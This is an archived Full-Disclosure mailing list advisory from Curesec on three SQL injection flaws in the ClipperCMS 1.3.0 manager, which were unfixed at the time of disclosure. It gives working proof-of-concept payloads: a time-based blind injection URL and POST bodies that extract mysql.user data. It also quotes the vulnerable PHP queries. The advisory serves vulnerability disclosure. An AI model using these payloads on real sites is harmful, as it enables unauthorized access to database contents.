lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <0MJYJr-1ZzBbv1Fr1-0036ux@mrelayeu.kundenserver.de> Date: Fri, 13 Nov 2015 17:06:31 +0100 From: "Curesec Research Team (CRT)" <crt@...esec.com> To: fulldisclosure@...lists.org Subject: [FD] ClipperCMS 1.3.0: SQL Injection Security Advisory - Curesec Research Team 1. Introduction Affected Product: ClipperCMS 1.3.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://www.clippercms.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0. An account with the role "Publisher" or "Administrator" is needed to exploit each of these vulnerabilities. 3. SQL Injection 1 (Blind) CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description The id parameter of the web user editor is vulnerable to blind SQL Injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23 -> true http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23 -> false Code /manager/actions/mutate_web_user.dynamic.php $sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where webuser=".$_GET['id'].""; 4. SQL Injection 2 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When updating a user, the newusername parameter is vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1 mode=12&id=3&blockedmode=0&stay=&oldusername=testtest &newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- - &newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query Code /manager/processors/save_user_processor.php $sql = "UPDATE " . $modx->getFullTableName('manager_users') . " SET username='$newusername'" . $updatepasswordsql . " WHERE id=$id"; 5. SQL Injection 3 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When updating a user, the country, role, blocked, blockeduntil, blockedafter, failedlogincount, and gender parameter are vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept The proof of concepts for the country, role, blocked, blockeduntil, failedlogincount, and blockedafter parameter are analog to this POC for gender: POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1 mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob= &gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0 &comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query Visiting the overview page of that user will show the result of the injected query. Code /manager/processors/save_user_processor.php $sql = "UPDATE " . $modx->getFullTableName('user_attributes') . " SET fullname='$fullname', role='$roleid', email='$email', phone='$phone', mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state', country='$country', gender='$gender', dob='$dob', photo='$photo', comment='$comment', failedlogincount='$failedlogincount', blocked=$blocked, blockeduntil=$blockeduntil, blockedafter=$blockedafter WHERE internalKey=$id"; 6. Solution This issue has not been fixed by the vendor. 7. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/ClipperCMS-130-SQL-Injection-99.html _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists